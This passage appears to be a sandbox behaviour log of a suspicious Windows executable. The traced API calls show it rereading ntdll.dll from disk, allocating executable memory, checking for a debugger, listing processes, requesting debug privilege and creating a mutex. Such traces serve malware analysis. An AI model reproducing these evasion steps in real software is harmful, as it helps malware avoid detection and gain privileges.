lpNumberOfBytesRead=0x19e4dc, lpOverlapped=0x0 | out: lpBuffer=0xe500000*, lpNumberOfBytesRead=0x19e4dc*=0x1784a0, lpOverlapped=0x0) returned 1 [0276.809] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0xe680000 [0276.844] CloseHandle (hObject=0x24c) returned 1 [0276.845] VirtualFree (lpAddress=0xe500000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0276.853] VirtualFree (lpAddress=0xe680000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0276.859] NtResumeThread (in: ThreadHandle=0x240, SuspendCount=0x19e524 | out: SuspendCount=0x19e524*=0x1) returned 0x0 [0276.934] ExitProcess (uExitCode=0x0) Thread: id = 289 os_tid = 0xcac Thread: id = 290 os_tid = 0xcb0 Thread: id = 291 os_tid = 0xcb4 Process: id = "95" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x5de49000" os_pid = "0xd08" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "94" os_parent_pid = "0xca4" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\" " cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010306" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8207 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8208 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8209 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8210 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 8211 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 8212 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 8213 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8214 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 8215 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 8216 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 8217 start_va = 0x77ce0000 end_va = 0x77e5afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8218 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8219 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8220 start_va = 0x7fff0000 end_va = 0x7ffdac8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8221 start_va = 0x7ffdac8b0000 end_va = 0x7ffdaca70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8222 start_va = 0x7ffdaca71000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdaca71000" filename = "" Region: id = 8225 start_va = 0x400000 end_va = 0x428fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8234 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 8235 start_va = 0x656d0000 end_va = 0x6571ffff monitored = 0 entry_point = 0x656e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8236 start_va = 0x65720000 end_va = 0x65799fff monitored = 0 entry_point = 0x65733290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8237 start_va = 0x776a0000 end_va = 0x7777ffff monitored = 0 entry_point = 0x776b3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8238 start_va = 0x657a0000 end_va = 0x657a7fff monitored = 0 entry_point = 0x657a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8239 start_va = 0x4a0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 8240 start_va = 0x776a0000 end_va = 0x7777ffff monitored = 0 entry_point = 0x776b3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8241 start_va = 0x75220000 end_va = 0x7539dfff monitored = 0 entry_point = 0x752d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8242 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8243 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 8244 start_va = 0x5f0000 end_va = 0x6adfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8245 start_va = 0x6b0000 end_va = 0x833fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 8246 start_va = 0x840000 end_va = 0x9cbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 8247 start_va = 0x9d0000 end_va = 0xcc9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 8248 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 8249 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 8250 start_va = 0x20000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 8251 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 8252 start_va = 0x77620000 end_va = 0x7769afff monitored = 0 entry_point = 0x7763e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 8253 start_va = 0x75e00000 end_va = 0x75ebdfff monitored = 0 entry_point = 0x75e35630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8254 start_va = 0x430000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 8255 start_va = 0x7b0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 8256 start_va = 0x75400000 end_va = 0x75443fff monitored = 0 entry_point = 0x75419d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8257 start_va = 0x76110000 end_va = 0x761bcfff monitored = 0 entry_point = 0x76124f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8258 start_va = 0x74a10000 end_va = 0x74a2dfff monitored = 0 entry_point = 0x74a1b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8259 start_va = 0x74a00000 end_va = 0x74a09fff monitored = 0 entry_point = 0x74a02a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8260 start_va = 0x760b0000 end_va = 0x76107fff monitored = 0 entry_point = 0x760f25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8261 start_va = 0xcd0000 end_va = 0xe3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 8262 start_va = 0x1d0000 end_va = 0x1f8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 8263 start_va = 0x30000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8264 start_va = 0x470000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8265 start_va = 0x8b0000 end_va = 0x997fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 8663 start_va = 0x4a0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 8664 start_va = 0x4f0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 8665 start_va = 0x4c0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 8666 start_va = 0x75b50000 end_va = 0x75c96fff monitored = 0 entry_point = 0x75b61cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 8667 start_va = 0x75cb0000 end_va = 0x75dfefff monitored = 0 entry_point = 0x75d66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 8668 start_va = 0x9a0000 end_va = 0x9c9fff monitored = 0 entry_point = 0x9a5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8669 start_va = 0xe40000 end_va = 0xfc7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e40000" filename = "" Region: id = 8670 start_va = 0x779d0000 end_va = 0x779fafff monitored = 0 entry_point = 0x779d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8671 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8672 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 8673 start_va = 0xfd0000 end_va = 0x1150fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fd0000" filename = "" Region: id = 8674 start_va = 0x1160000 end_va = 0x255ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 8693 start_va = 0x9a0000 end_va = 0x9c8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 8695 start_va = 0x470000 end_va = 0x475fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Thread: id = 292 os_tid = 0xd0c [0276.974] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x19f23c | out: HeapArray=0x19f23c*=0x4f0000) returned 0x1 [0276.985] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x19f1ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0276.988] NtCreateFile (in: FileHandle=0x19f20c, DesiredAccess=0x120089, ObjectAttributes=0x19f1d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19f1f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19f20c*=0x6c, IoStatusBlock=0x19f1f4*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0277.174] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f27a0) returned 1 [0277.179] NtQueryInformationFile (in: FileHandle=0x6c, IoStatusBlock=0x19f1f4, FileInformation=0x19f14c, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19f1f4, FileInformation=0x19f14c) returned 0x0 [0277.188] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1788a0) returned 0x6ba020 [0277.277] NtReadFile (in: FileHandle=0x6c, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x19f1f4, Buffer=0x6ba020, BufferLength=0x1784a0, ByteOffset=0x19f164*=0, Key=0x0 | out: IoStatusBlock=0x19f1f4, Buffer=0x6ba020*) returned 0x0 [0277.280] NtClose (Handle=0x6c) returned 0x0 [0277.280] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x17b001) returned 0x84f020 [0277.311] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x6ba020) returned 1 [0277.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f1e0*=0x0, ZeroBits=0x0, RegionSize=0x19f1e4*=0x2f9522, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x19f1e0*=0x9d0000, RegionSize=0x19f1e4*=0x2fa000) returned 0x0 [0277.383] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1000) returned 0x4f3388 [0277.383] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1000) returned 0x4f4390 [0277.384] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1000) returned 0x4f5398 [0277.384] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x2000) returned 0x4f63a0 [0277.384] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f5398) returned 1 [0277.384] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x3000) returned 0x4f83a8 [0277.384] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f63a0) returned 1 [0277.384] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x4000) returned 0x4fb3b0 [0277.385] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f83a8) returned 1 [0277.385] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x5000) returned 0x4f5398 [0277.385] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4fb3b0) returned 1 [0277.385] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1000) returned 0x4fa3a0 [0277.385] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x2000) returned 0x4fb3a8 [0277.385] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4fa3a0) returned 1 [0277.385] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x3000) returned 0x4fd3b0 [0277.385] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4fb3a8) returned 1 [0277.385] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x4000) returned 0x5003b8 [0277.386] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4fd3b0) returned 1 [0277.386] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x5000) returned 0x4fa3a0 [0277.386] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x5003b8) returned 1 [0277.386] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1000) returned 0x4ff3a8 [0277.386] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x2000) returned 0x5003b0 [0277.386] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4ff3a8) returned 1 [0277.386] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x3000) returned 0x5023b8 [0277.386] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x5003b0) returned 1 [0277.386] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x4000) returned 0x5053c0 [0277.386] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x5023b8) returned 1 [0277.386] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x5000) returned 0x4ff3a8 [0277.386] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x5053c0) returned 1 [0277.387] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f3388) returned 1 [0277.387] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f4390) returned 1 [0277.387] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f5398) returned 1 [0277.387] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4fa3a0) returned 1 [0277.387] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4ff3a8) returned 1 [0277.442] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1000) returned 0x4f3388 [0277.442] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1000) returned 0x4f4390 [0277.442] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1000) returned 0x4f5398 [0277.442] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x2000) returned 0x4f63a0 [0277.442] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f5398) returned 1 [0277.443] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x3000) returned 0x4f83a8 [0277.443] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f63a0) returned 1 [0277.443] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x4000) returned 0x4fb3b0 [0277.444] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f83a8) returned 1 [0277.444] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x5000) returned 0x4f5398 [0277.445] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4fb3b0) returned 1 [0277.445] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1000) returned 0x4fa3a0 [0277.445] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x2000) returned 0x4fb3a8 [0277.445] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4fa3a0) returned 1 [0277.445] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x3000) returned 0x4fd3b0 [0277.446] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4fb3a8) returned 1 [0277.446] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x4000) returned 0x5003b8 [0277.446] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4fd3b0) returned 1 [0277.446] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x5000) returned 0x4fa3a0 [0277.446] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x5003b8) returned 1 [0277.446] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1000) returned 0x4ff3a8 [0277.446] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x2000) returned 0x5003b0 [0277.446] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4ff3a8) returned 1 [0277.446] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x3000) returned 0x5023b8 [0277.446] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x5003b0) returned 1 [0277.446] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x4000) returned 0x5053c0 [0277.446] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x5023b8) returned 1 [0277.446] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x5000) returned 0x4ff3a8 [0277.447] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x5053c0) returned 1 [0277.447] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f3388) returned 1 [0277.447] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f4390) returned 1 [0277.447] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f5398) returned 1 [0277.447] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4fa3a0) returned 1 [0277.447] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4ff3a8) returned 1 [0277.447] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x19f18c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0277.447] NtCreateFile (in: FileHandle=0x19f1ac, DesiredAccess=0x120089, ObjectAttributes=0x19f174*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19f194, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19f1ac*=0x6c, IoStatusBlock=0x19f194*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0277.447] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f27a0) returned 1 [0277.447] NtQueryInformationFile (in: FileHandle=0x6c, IoStatusBlock=0x19f194, FileInformation=0x19ef08, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x19f194, FileInformation=0x19ef08) returned 0x0 [0277.448] NtClose (Handle=0x6c) returned 0x0 [0277.448] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x208) returned 0x4f3388 [0277.448] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f3388) returned 1 [0277.453] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x657a11d0, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f1c8, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f1c8*(BaseAddress=0x657a1000, AllocationBase=0x657a0000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0277.964] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0x19f220, Length=0x2, ResultLength=0x0 | out: SystemInformation=0x19f220, ResultLength=0x0) returned 0x0 [0277.990] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x19f244, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19f244, ReturnLength=0x0) returned 0x0 [0278.023] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x84f020) returned 1 [0278.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19eed4*=0x0, ZeroBits=0x0, RegionSize=0x19eed8*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19eed4*=0x20000, RegionSize=0x19eed8*=0x10000) returned 0x0 [0278.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0xc0000004 [0278.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f234*=0x20000, RegionSize=0x19eef8, FreeType=0x8000) returned 0x0 [0278.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19eec0*=0x0, ZeroBits=0x0, RegionSize=0x19eec4*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19eec0*=0x20000, RegionSize=0x19eec4*=0x20000) returned 0x0 [0278.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0x0 [0278.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f234*=0x20000, RegionSize=0x19f238, FreeType=0x8000) returned 0x0 [0278.084] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x19eff0 | out: Value="RDhJ0CNFevzX") returned 0x0 [0278.084] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32.dll", BaseAddress=0x19f060 | out: BaseAddress=0x19f060*=0x77620000) returned 0x0 [0278.116] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x19f24c | out: TokenHandle=0x19f24c*=0x80) returned 0x0 [0278.121] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19f240 | out: lpLuid=0x19f240*(LowPart=0x14, HighPart=0)) returned 1 [0278.131] NtAdjustPrivilegesToken (in: TokenHandle=0x80, DisableAllPrivileges=0, NewState=0x19f23c, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x106 [0278.135] NtClose (Handle=0x80) returned 0x0 [0278.135] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x19eb80 | out: Value="RDhJ0CNFevzX") returned 0x0 [0278.144] NtOpenDirectoryObject (in: FileHandle=0x19f040, DesiredAccess=0x2000f, ObjectAttributes=0x19f00c*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0x19f040*=0x80) returned 0x0 [0278.151] NtCreateMutant (in: MutantHandle=0x19f26c, DesiredAccess=0x1f0001, ObjectAttributes=0x19eff4*(Length=0x18, RootDirectory=0x80, ObjectName="14-ARU9TUYI8wI3z", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0x19f26c*=0xa4) returned 0x0 